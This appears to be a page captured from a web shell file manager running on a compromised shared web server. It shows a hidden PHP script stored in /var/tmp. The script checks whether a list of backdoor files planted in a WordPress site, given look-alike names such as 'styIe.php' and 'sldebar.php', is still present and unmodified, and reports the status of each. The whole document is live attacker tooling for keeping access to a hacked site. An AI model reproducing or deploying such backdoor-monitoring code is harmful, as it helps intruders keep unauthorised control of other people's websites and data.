HEX
Server: Apache
System: Linux iad1-shared-b8-22 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_7uh9vd (6523960)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: //var/tmp/.requests
<?php   $r = '/home/sermaray/sermaray.com'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php"=>"bd@@313245@@If-Unmodified-Since",
"/wp-content/plugins/seo-1751116060/qbasic.php"=>"bd@@1136450@@1057",
"/wp-content/themes/author_template_1748015248/sldebar.php"=>"bd@@250948@@727",
"/wp-content/themes/home-1748025567/styIe.php"=>"bd@@260294@@727",
"/wp-content/plugins/seo-1751116060/wp-config.php"=>"bd@@426701@@727",
"/751a50.php"=>"bd@@18128@@105",
"/wp-content/themes/twentytwelve/tag.php"=>"bd@@378079@@Clear-Site-Data"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');